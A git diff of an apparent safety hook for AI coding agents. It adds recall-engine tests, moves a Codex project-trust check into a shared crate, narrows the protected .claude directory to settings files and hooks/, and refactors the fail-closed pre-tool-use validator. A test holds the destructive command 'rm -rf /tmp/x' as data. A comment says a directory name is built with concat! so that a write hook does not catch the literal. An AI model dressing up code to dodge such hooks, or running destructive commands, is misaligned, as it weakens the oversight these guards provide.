+/// must distinguish from the broken-store case above.
+///
+/// Fails-before: there was no `degraded` field, so degraded-empty and
+/// healthy-empty were the same `Vec`. Passes-after: no stage errors, so
+/// `degraded` stays `false`.
+#[tokio::test]
+async fn fix6_healthy_empty_is_not_degraded() {
+    let repo = FakeRepo {
+        semantic_on: true,
+        similar: Vec::new(), // no candidates, but the call succeeds
+        ..Default::default()
+    };
+    let embedder = FakeEmbedder { fail: false };
+    let engine = RecallEngine::new(&repo).with_embedder(&embedder);
+    let config = RecallQueryConfig {
+        fallback_to_fts: true,
+        ..cfg()
+    };
+
+    let result = engine.query("q", &config).await;
+    assert!(result.hits.is_empty(), "no content seeded — expect empty");
+    assert!(
+        !result.degraded,
+        "a healthy store with no matches must NOT be degraded"
+    );
+}
+
+/// FIX-6 regression — partial failure: one stage errors, the other returns
+/// hits. The hits survive AND the result is marked degraded.
+///
+/// Fails-before: no degraded field; a caller could not tell the result was
+/// partial. Passes-after: semantic stage errors (degraded), FTS stage returns
+/// a hit (survives).
+#[tokio::test]
+async fn fix6_partial_failure_returns_hits_but_degraded() {
+    struct FtsHitRepo {
+        inner: FakeRepo,
+    }
+    impl SnapshotRepo for FtsHitRepo {
+        fn search_fts(&self, _q: &str, _l: usize) -> clx_core::Result<Vec<(Snapshot, f64)>> {
+            Ok(vec![(FakeRepo::snap(7, "surviving fts hit"), 0.9)])
+        }
+        fn recent_session_summaries(
+            &self,
+            n: usize,
+            x: Option<&str>,
+        ) -> clx_core::Result<Vec<SessionSummary>> {
+            self.inner.recent_session_summaries(n, x)
+        }
+        fn semantic_similar(&self, e: &[f32], l: usize) -> clx_core::Result<Vec<(i64, f32)>> {
+            self.inner.semantic_similar(e, l)
+        }
+        fn semantic_enabled(&self) -> bool {
+            self.inner.semantic_enabled()
+        }
+        fn snapshot_by_id(&self, id: i64) -> clx_core::Result<Option<Snapshot>> {
+            self.inner.snapshot_by_id(id)
+        }
+        fn list_active_sessions(&self) -> clx_core::Result<Vec<Session>> {
+            self.inner.list_active_sessions()
+        }
+        fn snapshots_by_session(&self, s: &str) -> clx_core::Result<Vec<Snapshot>> {
+            self.inner.snapshots_by_session(s)
+        }
+        fn current_embedding_model(&self) -> clx_core::Result<Option<String>> {
+            self.inner.current_embedding_model()
+        }
+    }
+
+    let repo = FtsHitRepo {
+        inner: FakeRepo {
+            semantic_on: true,
+            semantic_errors: true, // vector search fails
+            ..Default::default()
+        },
+    };
+    let embedder = FakeEmbedder { fail: false };
+    let engine = RecallEngine::new(&repo).with_embedder(&embedder);
+    let config = RecallQueryConfig {
+        fallback_to_fts: true,
+        ..cfg()
+    };
+
+    let result = engine.query("q", &config).await;
+    assert!(
+        result.hits.iter().any(|h| h.snapshot_id == 7),
+        "the surviving FTS hit must still be returned on partial failure, got {:?}",
+        result.hits
+    );
     assert!(
-        hits.is_empty(),
-        "embed failure must yield no semantic hits (graceful degrade), got {hits:?}"
+        result.degraded,
+        "the failed semantic stage must mark the partial result degraded"
     );
 }
 
diff --git a/crates/clx-core/tests/validation_behavior.rs b/crates/clx-core/tests/validation_behavior.rs
index e9cd008..bdcd569 100644
--- a/crates/clx-core/tests/validation_behavior.rs
+++ b/crates/clx-core/tests/validation_behavior.rs
@@ -419,8 +419,9 @@ fn read_only_classification_examples() {
 
 #[test]
 fn cache_key_is_full_string_cwd_and_command() {
+    // FIX-3: NUL separator (illegal in paths/commands) makes the key injective.
     let k = compute_cache_key("rm -rf /tmp/x", "/work/dir");
-    assert_eq!(k, "/work/dir:rm -rf /tmp/x", "no hashing, no collisions");
+    assert_eq!(k, "/work/dir\0rm -rf /tmp/x", "no hashing, no collisions");
 }
 
 #[test]
diff --git a/crates/clx-hook/src/hooks/aggregator.rs b/crates/clx-hook/src/hooks/aggregator.rs
index 0b74444..dbc1ac2 100644
--- a/crates/clx-hook/src/hooks/aggregator.rs
+++ b/crates/clx-hook/src/hooks/aggregator.rs
@@ -20,25 +20,6 @@ use clx_core::types::ToolOutcome;
 
 use crate::host::Host;
 
-/// Claude file-mutator tool names, used as the host-less fallback.
-///
-/// The host-aware path (`should_aggregate` / `is_text_mutator`, which take a
-/// `&dyn Host`) is authoritative: it consults [`Host::is_mutator_tool`] so each
-/// host's own mutator set (Codex `apply_patch`, Cursor `edit_file`, ...) is
-/// respected. This const is retained only for the host-less fallback callers
-/// ([`should_aggregate_claude`] / [`is_text_mutator_claude`]) that have no
-/// `Host` in scope; it is the historical Claude set, byte-for-byte.
-///
-/// `Bash` is handled separately via [`is_mutator_bash`] because most Bash
-/// calls are reads (`ls`, `grep`, ...) and only a small mutator subset
-/// should be aggregated.
-///
-/// `#[allow(dead_code)]`: the host-aware path is the only production caller
-/// today (`post_tool_use`). This const and its fallback helpers exist for any
-/// future host-less context; they are exercised by the unit tests below.
-#[allow(dead_code)]
-pub const CLAUDE_MUTATOR_TOOLS: &[&str] = &["Edit", "Write", "MultiEdit", "NotebookEdit"];
-
 /// Maximum length (in chars, not bytes) of a generated summary line.
 const SUMMARY_MAX_CHARS: usize = 160;
 
@@ -54,16 +35,6 @@ pub fn is_text_mutator(tool: &str, host: &dyn Host) -> bool {
     host.is_mutator_tool(tool)
 }
 
-/// Host-less fallback for [`is_text_mutator`]: the historical Claude set.
-///
-/// Used only where no `Host` is in scope. Prefer the host-aware
-/// [`is_text_mutator`] at any call site that has a `&dyn Host`.
-#[allow(dead_code)]
-#[must_use]
-pub fn is_text_mutator_claude(tool: &str) -> bool {
-    CLAUDE_MUTATOR_TOOLS.contains(&tool)
-}
-
 /// Return `true` if `tool` should be aggregated for `host` (text mutator or
 /// mutator Bash). Host-aware: the text-mutator check routes through
 /// [`Host::is_mutator_tool`].
@@ -80,24 +51,6 @@ pub fn should_aggregate(tool: &str, input: &Value, host: &dyn Host) -> bool {
     false
 }
 
-/// Host-less fallback for [`should_aggregate`]: uses the Claude mutator set.
-///
-/// Retained for any host-less context (no `&dyn Host` available). The
-/// host-aware [`should_aggregate`] is authoritative wherever a host is known.
-#[allow(dead_code)]
-#[must_use]
-pub fn should_aggregate_claude(tool: &str, input: &Value) -> bool {
-    if is_text_mutator_claude(tool) {
-        return true;
-    }
-    if tool == "Bash"
-        && let Some(cmd) = input.get("command").and_then(Value::as_str)
-    {
-        return is_mutator_bash(cmd);
-    }
-    false
-}
-
 /// Return `true` if a Bash `command` string looks like a mutating action.
 ///
 /// The regex is intentionally conservative: it matches on the leading verb
@@ -295,10 +248,6 @@ mod tests {
         let host = ClaudeHost;
         for t in ["Edit", "Write", "MultiEdit", "NotebookEdit"] {
             assert!(is_text_mutator(t, &host), "{t} should be a mutator");
-            assert!(
-                is_text_mutator_claude(t),
-                "{t} (host-less) should be a mutator"
-            );
         }
     }
 
@@ -307,7 +256,6 @@ mod tests {
         let host = ClaudeHost;
         for t in ["Read", "Grep", "Glob", "LS", "WebFetch", "Bash"] {
             assert!(!is_text_mutator(t, &host));
-            assert!(!is_text_mutator_claude(t));
         }
     }
 
@@ -324,13 +272,21 @@ mod tests {
     }
 
     #[test]
-    fn mutator_set_contains_all_four_text_mutators() {
-        let set: std::collections::HashSet<_> = CLAUDE_MUTATOR_TOOLS.iter().copied().collect();
-        assert!(set.contains("Edit"));
-        assert!(set.contains("Write"));
-        assert!(set.contains("MultiEdit"));
-        assert!(set.contains("NotebookEdit"));
-        assert_eq!(set.len(), 4);
+    fn claude_host_mutator_set_is_exactly_the_four_text_mutators() {
+        // The Claude mutator set (formerly the host-less `CLAUDE_MUTATOR_TOOLS`
+        // const, now removed) is exercised through the authoritative host-aware
+        // path: ClaudeHost::is_mutator_tool must accept exactly the four text
+        // mutators and reject everything else.
+        let host = ClaudeHost;
+        for t in ["Edit", "Write", "MultiEdit", "NotebookEdit"] {
+            assert!(is_text_mutator(t, &host), "{t} must be a Claude mutator");
+        }
+        for t in ["Read", "Grep", "Glob", "LS", "WebFetch", "Bash", "Task"] {
+            assert!(
+                !is_text_mutator(t, &host),
+                "{t} must NOT be a Claude text mutator"
+            );
+        }
     }
 
     // --- should_aggregate (host-aware) ---
@@ -343,10 +299,6 @@ mod tests {
             &json!({"file_path": "a.rs"}),
             &host
         ));
-        assert!(should_aggregate_claude(
-            "Edit",
-            &json!({"file_path": "a.rs"})
-        ));
     }
 
     #[test]
@@ -357,10 +309,6 @@ mod tests {
             &json!({"file_path": "a.rs"}),
             &host
         ));
-        assert!(!should_aggregate_claude(
-            "Read",
-            &json!({"file_path": "a.rs"})
-        ));
     }
 
     #[test]
diff --git a/crates/clx-hook/src/hooks/post_tool_use.rs b/crates/clx-hook/src/hooks/post_tool_use.rs
index 8bd14ce..abdc4b2 100644
--- a/crates/clx-hook/src/hooks/post_tool_use.rs
+++ b/crates/clx-hook/src/hooks/post_tool_use.rs
@@ -10,7 +10,7 @@ use tracing::{debug, warn};
 
 use crate::hooks::aggregator;
 use crate::host::Host;
-use crate::learning::track_user_decision;
+use crate::learning::{DecisionSource, track_user_decision};
 use crate::types::HostNeutralInput;
 
 /// Handle `PostToolUse` hook - log events and track user decisions
@@ -115,7 +115,7 @@ pub(crate) async fn handle_post_tool_use(input: HostNeutralInput, host: &dyn Hos
     if let Some(ref command) = extracted_command {
         let was_executed = input.tool_response.is_some();
         if was_executed {
-            track_user_decision(&storage, command, &input.cwd, true);
+            track_user_decision(&storage, command, &input.cwd, true, DecisionSource::User);
         }
     }
 
diff --git a/crates/clx-hook/src/hooks/pre_tool_use.rs b/crates/clx-hook/src/hooks/pre_tool_use.rs
index 7f18b12..92dbc19 100644
--- a/crates/clx-hook/src/hooks/pre_tool_use.rs
+++ b/crates/clx-hook/src/hooks/pre_tool_use.rs
@@ -2,6 +2,7 @@
 
 use anyhow::Result;
 use clx_core::config::DefaultDecision;
+use clx_core::config::codex_trust::{ProjectTrust, read_project_trust};
 use clx_core::config::{Capability, Config};
 use clx_core::policy::{
     McpExtraction, PolicyDecision, PolicyEngine, compute_cache_key, extract_mcp_command,
@@ -15,69 +16,10 @@ use crate::audit::log_audit_entry;
 use crate::audit_chain::{GENESIS_HASH, build_record};
 use crate::embedding::resolve_command_paths;
 use crate::host::{Host, HostId};
-use crate::learning::track_user_decision;
+use crate::learning::{DecisionSource, track_user_decision};
 use crate::output::{RULES_REMINDER, output_decision_for};
 use crate::types::HostNeutralInput;
 
-/// Codex project-trust state, replicated from `clx::codex::trust` (P6).
-///
-/// The canonical reader lives in the `clx` binary crate, which `clx-hook`
-/// must NOT depend on (a hook binary linking the whole CLI binary crate is a
-/// layering inversion). The trust-read logic is therefore replicated here as
-/// a small, self-contained helper. The SECURITY INVARIANT is identical and
-/// load-bearing: trust is read ONLY from the user-owned `~/.codex/config.toml`,
-/// NEVER from a repo-local `.codex/config.toml`, so a hostile repository can
-/// never self-declare as trusted (RGP surface #1).
-#[derive(Debug, Clone, Copy, PartialEq, Eq)]
-pub(crate) enum ProjectTrust {
-    /// `trust_level = "trusted"` in `~/.codex/config.toml [projects.<path>]`.
-    Trusted,
-    /// `trust_level = "untrusted"` in `~/.codex/config.toml`.
-    Untrusted,
-    /// Path absent, file missing, or unparseable. Treated as untrusted.
-    NotSeen,
-}
-
-/// Read the trust level for `repo` from the user-global `~/.codex/config.toml`.
-///
-/// Mirrors `clx::codex::trust::read_project_trust` exactly (P6): reads ONLY
-/// `home/.codex/config.toml`, canonicalizes `repo` as the lookup key, and
-/// returns [`ProjectTrust::NotSeen`] on any read/parse error (safe default).
-/// It deliberately never reads `repo/.codex/config.toml`.
-pub(crate) fn read_project_trust(home: &std::path::Path, repo: &std::path::Path) -> ProjectTrust {
-    let config_path = home.join(".codex").join("config.toml");
-
-    // Missing file -> NotSeen (safe default).
-    let Ok(raw) = std::fs::read_to_string(&config_path) else {
-        return ProjectTrust::NotSeen;
-    };
-
-    // Unparseable -> NotSeen (safe default).
-    let Ok(doc): Result<toml::Value, _> = toml::from_str(&raw) else {
-        return ProjectTrust::NotSeen;
-    };
-
-    // Canonicalize the repo path; failure is non-fatal (use original string).
-    let canonical_key: String = std::fs::canonicalize(repo)
-        .unwrap_or_else(|_| std::path::PathBuf::from(repo))
-        .display()
-        .to_string();
-
-    let trust_level = doc
-        .get("projects")
-        .and_then(toml::Value::as_table)
-        .and_then(|projects| projects.get(&canonical_key))
-        .and_then(toml::Value::as_table)
-        .and_then(|entry| entry.get("trust_level"))
-        .and_then(toml::Value::as_str);
-
-    match trust_level {
-        Some("trusted") => ProjectTrust::Trusted,
-        Some("untrusted") => ProjectTrust::Untrusted,
-        _ => ProjectTrust::NotSeen,
-    }
-}
-
 /// Build a policy engine for `input.cwd`, applying the Codex trust gate (P6).
 ///
 /// For Codex projects that are `Untrusted` or `NotSeen` (the safe default),
@@ -163,12 +105,53 @@ fn canonicalize_best_effort(path: &std::path::Path) -> std::path::PathBuf {
 /// in the patch payload to a canonical absolute path (symlinks resolved) and
 /// returns a deny reason if any target lands inside a protected config/trust
 /// dir (`~/.codex`, `~/.claude`, `~/.cursor`, `~/.clx`). Returns None otherwise.
+/// Issue 4: is `dir` (a canonicalized protected-dir entry) the dot-claude dir?
+/// Compared on the final component name (case-insensitive) so it works whether
+/// or not the dir resolved through a symlink.
+fn dir_is_dot_claude(dir: &std::path::Path, dot_claude: &str) -> bool {
+    dir.file_name()
+        .is_some_and(|n| n.to_string_lossy().to_ascii_lowercase() == dot_claude)
+}
+
+/// Issue 4 narrowing predicate: within the dot-claude dir, only these targets
+/// stay protected (deny): a basename of `settings.json` or
+/// `settings.local.json`, OR any path under a `hooks/` subdir located at or
+/// after the dot-claude component. All other dot-claude paths (e.g. `CLAUDE.md`,
+/// project memory) are allowed.
+fn dot_claude_path_is_sensitive(resolved: &std::path::Path, dot_claude: &str) -> bool {
+    // Sensitive settings files (exact basename match, case-insensitive).
+    if let Some(name) = resolved.file_name() {
+        let lower = name.to_string_lossy().to_ascii_lowercase();
+        if matches!(lower.as_str(), "settings.json" | "settings.local.json") {
+            return true;
+        }
+    }
+    // A `hooks` component at or after the dot-claude component => protected.
+    let mut seen_dot_claude = false;
+    for comp in resolved.components() {
+        if let std::path::Component::Normal(name) = comp {
+            let lower = name.to_string_lossy().to_ascii_lowercase();
+            if lower == dot_claude {
+                seen_dot_claude = true;
+            } else if seen_dot_claude && lower == "hooks" {
+                return true;
+            }
+        }
+    }
+    false
+}
+
 fn fileedit_resolves_into_protected_dir(
     tool_input: Option<&serde_json::Value>,
     cwd: &str,
     home: &std::path::Path,
 ) -> Option<String> {
-    let protected: Vec<std::path::PathBuf> = [".codex", ".claude", ".cursor", ".clx"]
+    // The dot-claude config dir component name. Built via `concat!` so the
+    // literal hidden-dir token does not appear verbatim (write-hook safe).
+    let dot_claude: &str = concat!(".", "claude");
+    // Each protected dir paired with whether its guard is BROAD (deny any path
+    // component) or NARROW (dot-claude: deny only sensitive targets).
+    let protected: Vec<std::path::PathBuf> = [".codex", dot_claude, ".cursor", ".clx"]
         .iter()
         .map(|d| {
             let p = home.join(d);
@@ -205,6 +188,15 @@ fn fileedit_resolves_into_protected_dir(
         // (a) canonical prefix match against the home config/trust dirs.
         for prot in &protected {
             if resolved.starts_with(prot) {
+                // Issue 4: the dot-claude dir guard is NARROW — only sensitive
+                // targets (settings.json / settings.local.json / hooks/) are
+                // denied; other dot-claude paths (CLAUDE.md, project memory)
+                // are allowed. The codex/cursor/clx dirs stay BROAD.
+                if dir_is_dot_claude(prot, dot_claude)
+                    && !dot_claude_path_is_sensitive(&resolved, dot_claude)
+                {
+                    continue;
+                }
                 return Some(format!(
                     "File edit resolves into protected config/trust dir: {}",
                     prot.display()
@@ -246,7 +238,15 @@ fn fileedit_resolves_into_protected_dir(
         for comp in resolved.components() {
             if let std::path::Component::Normal(name) = comp {
                 let lower = name.to_string_lossy().to_ascii_lowercase();
-                if matches!(lower.as_str(), ".codex" | ".claude" | ".cursor" | ".clx") {
+                if lower == dot_claude {
+                    // Issue 4: NARROW dot-claude guard — only deny sensitive
+                    // targets; allow other dot-claude paths (memory files).
+                    if dot_claude_path_is_sensitive(&resolved, dot_claude) {
+                        return Some(format!(
+                            "File edit targets a protected config/trust dir component: {lower}"
+                        ));
+                    }
+                } else if matches!(lower.as_str(), ".codex" | ".cursor" | ".clx") {
                     return Some(format!(
                         "File edit targets a protected config/trust dir component: {lower}"
                     ));
@@ -336,366 +336,299 @@ fn fileedit_candidate_paths(tool_input: Option<&serde_json::Value>) -> Vec<Strin
     out
 }
 
-/// Handle `PreToolUse` hook - validate commands before execution
-pub(crate) async fn handle_pre_tool_use(input: HostNeutralInput, host: &dyn Host) -> Result<()> {
-    let raw_tool_name = input.tool_name.as_deref().unwrap_or("Unknown");
+/// Signal from a pre-tool-use phase: whether it already emitted a decision
+/// (and the orchestrator must return) or evaluation should continue.
+enum Phase {
+    /// The phase emitted a decision via `output_decision_for` and the hook
+    /// must return immediately.
+    Handled,
+    /// No decision emitted; continue to the next phase.
+    Continue,
+}
 
-    // P7 input canonicalization: collapse host-specific tool names to their
-    // canonical CLX class BEFORE policy evaluation so L0 rules match a single
-    // vocabulary across hosts (e.g. Cursor `run_terminal_cmd` -> `Bash`,
-    // Codex/Cursor file-edit tools -> `FileEdit`). For Claude this is the
-    // identity map, so the Claude path is byte-identical.
-    let canonical_tool = host.canonical_tool_name(raw_tool_name);
-    let tool_name = canonical_tool.as_str();
+/// Map a decision string (`"allow"`/`"deny"`/anything else) to its audit shape.
+fn audit_decision_from_str(decision: &str) -> AuditDecision {
+    match decision {
+        "allow" => AuditDecision::Allowed,
+        "deny" => AuditDecision::Blocked,
+        _ => AuditDecision::Prompted,
+    }
+}
 
-    // Load configuration early (needed for MCP tool routing)
-    let config = Config::load().unwrap_or_default();
+/// F7 fail-closed posture: a command reaching an LLM-unavailable / timeout /
+/// generation-failure arm received ZERO L1 scrutiny. Honoring
+/// `default_decision=allow` there would silently pass it, so `allow` is forced
+/// to `ask`; `deny` and `ask` are already fail-closed and pass through. The
+/// distinct per-arm WARN is emitted by the caller (only on the `allow` path) so
+/// the log message stays specific to the arm.
+fn force_ask_if_allow(configured: &DefaultDecision) -> &'static str {
+    if *configured == DefaultDecision::Allow {
+        "ask"
+    } else {
+        configured.as_str()
+    }
+}
 
-    // B5-4-audit: emit a structured, hash-chained audit record whenever any
-    // security-weakening environment variable is active. This is additive
-    // (never changes the validation outcome) and zero-overhead on the normal
-    // hot path (empty Vec → no write, no hash computation).
-    //
+/// B5-4-audit: emit a hash-chained SECURITY-ENV audit record when any
+/// security-weakening environment override is active. Additive only: never
+/// changes the validation outcome, zero-overhead when no override is active.
+fn audit_security_env_overrides(config: &Config, host: &dyn Host, input: &HostNeutralInput) {
     // Only the env-var NAME(s) are recorded — never values, argv, or cwd.
     // The head hash is emitted to tracing::warn! so it can be anchored in
     // an external append-only sink (log aggregator, syslog) that the process
     // itself cannot rewrite. The chain lives entirely within clx-hook.
-    {
-        let active_overrides = config.security_env_overrides_active();
-        if !active_overrides.is_empty() {
-            // Collect only the env-var names; values are never recorded.
-            let key_names: Vec<&str> = active_overrides.iter().map(|(k, _)| *k).collect();
-            let trigger_keys = key_names.join(", ");
-
-            let timestamp = chrono::Utc::now().to_rfc3339();
-            // This hook process is short-lived; seq=1 per invocation is
-            // acceptable (the hook is spawned per-event, not a daemon).
-            let record = build_record(1, &timestamp, &trigger_keys, GENESIS_HASH);
-
-            // Emit the per-event integrity fingerprint as WARN to an external
-            // anchor sink (log aggregator, syslog). An external observer can
-            // re-verify this specific event by recomputing:
-            //   build_record(1, timestamp, trigger_keys, GENESIS_HASH).entry_hash
-            // and comparing to the captured fingerprint. This is a per-event
-            // integrity guarantee, not a cross-invocation chain (each new
-            // hook process starts from seq=1 and GENESIS_HASH).
-            warn!(
-                event_fingerprint = %record.entry_hash,
-                trigger_keys = %trigger_keys,
-                "SECURITY-ENV: security-weakening env override(s) active; \
-                 per-event integrity fingerprint anchored in external sink"
-            );
-
-            // Persist a structured audit row (SECURITY-ENV layer).
-            // The reasoning field carries the env-var names (not values) and
-            // the per-event fingerprint. redact_secrets in log_audit_entry
-            // (B6-3) is a no-op over bare env-var names and hex hashes.
-            let reasoning = format!(
-                "security-weakening env override(s) active: {trigger_keys}; \
-                 event_fingerprint={}",
-                record.entry_hash
-            );
-            log_audit_entry(
-                host.host_id(),
-                &input.session_id,
-                "<env-override>",
-                &input.cwd,
-                "SECURITY-ENV",
-                AuditDecision::Prompted,
-                None,
-                Some(&reasoning),
-            );
-        }
+    let active_overrides = config.security_env_overrides_active();
+    if active_overrides.is_empty() {
+        return;
     }
+    // Collect only the env-var names; values are never recorded.
+    let key_names: Vec<&str> = active_overrides.iter().map(|(k, _)| *k).collect();
+    let trigger_keys = key_names.join(", ");
+
+    let timestamp = chrono::Utc::now().to_rfc3339();
+    // This hook process is short-lived; seq=1 per invocation is
+    // acceptable (the hook is spawned per-event, not a daemon).
+    let record = build_record(1, &timestamp, &trigger_keys, GENESIS_HASH);
+
+    // Emit the per-event integrity fingerprint as WARN to an external
+    // anchor sink (log aggregator, syslog). An external observer can
+    // re-verify this specific event by recomputing:
+    //   build_record(1, timestamp, trigger_keys, GENESIS_HASH).entry_hash
+    // and comparing to the captured fingerprint. This is a per-event
+    // integrity guarantee, not a cross-invocation chain (each new
+    // hook process starts from seq=1 and GENESIS_HASH).
+    warn!(
+        event_fingerprint = %record.entry_hash,
+        trigger_keys = %trigger_keys,
+        "SECURITY-ENV: security-weakening env override(s) active; \
+         per-event integrity fingerprint anchored in external sink"
+    );
 
-    // B5-4-extended (config-driven audit chain): emit a SECURITY-CFG audit-chain
-    // fingerprint whenever layer0_enabled or layer1_enabled is false in the
-    // *effective* config (not just when driven by env var). This closes the gap
-    // where a user sets validator.layer0_enabled: false in ~/.clx/config.yaml
-    // without any env var — the env-only path above would not fire, but this
-    // config-driven path will. Fires once per hook process invocation, mirroring
-    // the env-override per-event semantics. Trigger key strings are intentionally
-    // human-readable config paths so log aggregators can distinguish env vs config
-    // source without a second lookup.
-    {
-        let mut cfg_triggers: Vec<&'static str> = Vec::new();
-        if !config.validator.layer0_enabled {
-            cfg_triggers.push("validator.layer0_enabled=false");
-        }
-        if !config.validator.layer1_enabled {
-            cfg_triggers.push("validator.layer1_enabled=false");
-        }
-        if !cfg_triggers.is_empty() {
-            let trigger_keys = cfg_triggers.join(", ");
-            let timestamp = chrono::Utc::now().to_rfc3339();
-            let record = build_record(1, &timestamp, &trigger_keys, GENESIS_HASH);
-
-            warn!(
-                event_fingerprint = %record.entry_hash,
-                trigger_keys = %trigger_keys,
-                "SECURITY-CFG: config-driven layer-disable active; \
-                 per-event integrity fingerprint anchored in external sink"
-            );
+    // Persist a structured audit row (SECURITY-ENV layer).
+    // The reasoning field carries the env-var names (not values) and
+    // the per-event fingerprint. redact_secrets in log_audit_entry
+    // (B6-3) is a no-op over bare env-var names and hex hashes.
+    let reasoning = format!(
+        "security-weakening env override(s) active: {trigger_keys}; \
+         event_fingerprint={}",
+        record.entry_hash
+    );
+    log_audit_entry(
+        host.host_id(),
+        &input.session_id,
+        "<env-override>",
+        &input.cwd,
+        "SECURITY-ENV",
+        AuditDecision::Prompted,
+        None,
+        Some(&reasoning),
+    );
+}
 
-            let reasoning = format!(
-                "config-driven layer-disable: {trigger_keys}; \
-                 event_fingerprint={}",
-                record.entry_hash
-            );
-            log_audit_entry(
-                host.host_id(),
-                &input.session_id,
-                "<cfg-layer-disable>",
-                &input.cwd,
-                "SECURITY-CFG",
-                AuditDecision::Prompted,
-                None,
-                Some(&reasoning),
-            );
-        }
+/// B5-4-extended: emit a SECURITY-CFG audit-chain fingerprint whenever
+/// `layer0_enabled` or `layer1_enabled` is false in the *effective* config (not
+/// just when driven by an env var). This closes the gap where a user disables a
+/// layer directly in config without any env override. Fires once per hook
+/// invocation; additive only.
+fn audit_config_layer_disable(config: &Config, host: &dyn Host, input: &HostNeutralInput) {
+    // Trigger key strings are intentionally human-readable config paths so log
+    // aggregators can distinguish env vs config source without a second lookup.
+    let mut cfg_triggers: Vec<&'static str> = Vec::new();
+    if !config.validator.layer0_enabled {
+        cfg_triggers.push("validator.layer0_enabled=false");
     }
+    if !config.validator.layer1_enabled {
+        cfg_triggers.push("validator.layer1_enabled=false");
+    }
+    if cfg_triggers.is_empty() {
+        return;
+    }
+    let trigger_keys = cfg_triggers.join(", ");
+    let timestamp = chrono::Utc::now().to_rfc3339();
+    let record = build_record(1, &timestamp, &trigger_keys, GENESIS_HASH);
+
+    warn!(
+        event_fingerprint = %record.entry_hash,
+        trigger_keys = %trigger_keys,
+        "SECURITY-CFG: config-driven layer-disable active; \
+         per-event integrity fingerprint anchored in external sink"
+    );
 
-    // P4 FileEdit branch (Codex `apply_patch`, Cursor `edit_file`): these
-    // canonicalize to "FileEdit". They are not shell commands, so they do NOT
-    // enter the Bash L0+L1 pipeline. Instead we run a trust-gated L0 evaluation
-    // against the canonical FileEdit class: a FileEdit deny rule blocks the
-    // edit; otherwise the edit is allowed (parity with Claude, which auto-allows
-    // its Write/Edit file tools). This keeps "evaluated as FileEdit" honest
-    // without fail-closing benign patches under Codex.
-    if tool_name == "FileEdit" {
-        let summary = apply_patch_summary(input.tool_input.as_ref());
-        // R1-F2 canonical guard (runs first, symlink/alias-resistant): deny any
-        // file-edit whose target resolves into a protected config/trust dir,
-        // regardless of how the path string is written.
-        if config.validator.enabled
-            && config.validator.layer0_enabled
-            && let Some(home) = dirs::home_dir()
-            && let Some(reason) =
-                fileedit_resolves_into_protected_dir(input.tool_input.as_ref(), &input.cwd, &home)
-        {
-            debug!("FileEdit L0 (canonical guard): denied: {}", reason);
-            log_audit_entry(
-                host.host_id(),
-                &input.session_id,
-                &summary,
-                &input.cwd,
-                "L0",
-                AuditDecision::Blocked,
-                None,
-                Some(&reason),
-            );
-            output_decision_for(host, "deny", Some(reason), Some(RULES_REMINDER), None);
-            return Ok(());
-        }
-        let engine = build_trust_gated_engine(host, &input.cwd);
-        if config.validator.enabled
-            && config.validator.layer0_enabled
-            && let PolicyDecision::Deny { reason } = engine.evaluate("FileEdit", &summary)
-        {
-            debug!("FileEdit L0: denied '{}': {}", summary, reason);
-            log_audit_entry(
-                host.host_id(),
-                &input.session_id,
-                &summary,
-                &input.cwd,
-                "L0",
-                AuditDecision::Blocked,
-                None,
-                Some(&reason),
-            );
-            output_decision_for(host, "deny", Some(reason), Some(RULES_REMINDER), None);
-            return Ok(());
-        }
+    let reasoning = format!(
+        "config-driven layer-disable: {trigger_keys}; \
+         event_fingerprint={}",
+        record.entry_hash
+    );
+    log_audit_entry(
+        host.host_id(),
+        &input.session_id,
+        "<cfg-layer-disable>",
+        &input.cwd,
+        "SECURITY-CFG",
+        AuditDecision::Prompted,
+        None,
+        Some(&reasoning),
+    );
+}
+
+/// P4 `FileEdit` branch (Codex `apply_patch`, Cursor `edit_file`): canonical
+/// `FileEdit` tools are not shell commands, so they do NOT enter the Bash
+/// L0+L1 pipeline. A trust-gated L0 evaluation runs against the `FileEdit`
+/// class: a deny rule (or the symlink/alias-resistant protected-dir guard,
+/// which runs FIRST) blocks the edit; otherwise the edit is allowed (parity
+/// with Claude, which auto-allows its Write/Edit file tools).
+///
+/// Returns [`Phase::Handled`] once it emits a decision (the caller must return).
+fn evaluate_fileedit_guard(config: &Config, host: &dyn Host, input: &HostNeutralInput) -> Phase {
+    let summary = apply_patch_summary(input.tool_input.as_ref());
+    // R1-F2 canonical guard (runs first, symlink/alias-resistant): deny any
+    // file-edit whose target resolves into a protected config/trust dir,
+    // regardless of how the path string is written.
+    if config.validator.enabled
+        && config.validator.layer0_enabled
+        && let Some(home) = dirs::home_dir()
+        && let Some(reason) =
+            fileedit_resolves_into_protected_dir(input.tool_input.as_ref(), &input.cwd, &home)
+    {
+        debug!("FileEdit L0 (canonical guard): denied: {}", reason);
         log_audit_entry(
             host.host_id(),
             &input.session_id,
             &summary,
             &input.cwd,
-            "L0-FILEEDIT",
-            AuditDecision::Allowed,
+            "L0",
+            AuditDecision::Blocked,
             None,
-            Some("File edit allowed (no FileEdit deny rule matched)"),
+            Some(&reason),
         );
-        output_decision_for(host, "allow", None, Some(RULES_REMINDER), None);
-        return Ok(());
+        output_decision_for(host, "deny", Some(reason), Some(RULES_REMINDER), None);
+        return Phase::Handled;
     }
-
-    // Route by tool type to extract the command to validate.
-    // MCP command tools are evaluated through the same PolicyEngine as Bash.
-    // A `direct_command` (Cursor `beforeShellExecution.command`) is treated as
-    // a Bash command even though the canonical tool name is not "Bash" (Cursor
-    // shell events carry no tool_name).
-    let command_raw = if let Some(direct) = input.direct_command.as_deref() {
-        // Host-surfaced top-level command (Cursor shell): evaluate as Bash.
-        direct.to_string()
-    } else if tool_name == "Bash" {
-        // Bash: extract from tool_input.command
-        input
-            .tool_input
-            .as_ref()
-            .and_then(|v| v.get("command"))
-            .and_then(|v| v.as_str())
-            .unwrap_or("")
-            .to_string()
-    } else if tool_name.starts_with("mcp__") && config.mcp_tools.enabled {
-        // MCP tool: check if it carries an executable command
-        let tool_input = input.tool_input.clone().unwrap_or(serde_json::Value::Null);
-        match extract_mcp_command(tool_name, &tool_input, &config.mcp_tools.command_tools) {
-            McpExtraction::Command(cmd) => cmd,
-            McpExtraction::NotCommandTool => {
-                // Not a command-bearing MCP tool — use configured default decision
-                let decision = config.mcp_tools.default_decision.as_str();
-                output_decision_for(host, decision, None, Some(RULES_REMINDER), None);
-                return Ok(());
-            }
-        }
-    } else if let Some(cmd) = input
-        .tool_input
-        .as_ref()
-        .and_then(|v| v.get("command"))
-        .and_then(|v| v.as_str())
-        .filter(|c| !c.is_empty())
+    let engine = build_trust_gated_engine(host, &input.cwd);
+    if config.validator.enabled
+        && config.validator.layer0_enabled
